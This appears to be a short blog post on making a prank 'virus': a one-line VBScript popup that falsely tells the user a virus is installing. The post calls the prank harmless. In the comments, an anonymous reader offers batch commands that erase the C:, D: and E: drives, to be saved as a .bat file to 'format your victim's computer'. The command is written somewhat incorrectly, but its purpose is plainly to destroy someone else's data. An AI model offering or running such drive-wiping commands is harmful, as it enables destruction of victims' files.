Make a scary virus

Here i am going to tell you a simple method to make a scary virus. Basically its the pop up script in Visual Basic and not an actual virus.


When you will click this specific virus icon, a window will pop up and a preset message will be displayed, for example

Don't worry it will not harm your computer. The process will stop even if you will click Yes.

How to make..?
Open Notepad (windows) and type this code: text2=msgbox("Virus is installing on your system",52,"Installing..."). You can change the italic message but do not edit other commands. This code will pop up a window as displayed above. Now save this file with extension .vbs for example, shubh.vbs
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Related Post: Make a shutdown virus.


Anonymous said...

wow that's fine but if you use this command (echo@ off
erase C:\-y
erase D:\-y
erase E:\-y)and save it as .bat or .cmd file so you can format your victim's computer.

shubh on Sat Jan 31, 06:22:00 PM said...

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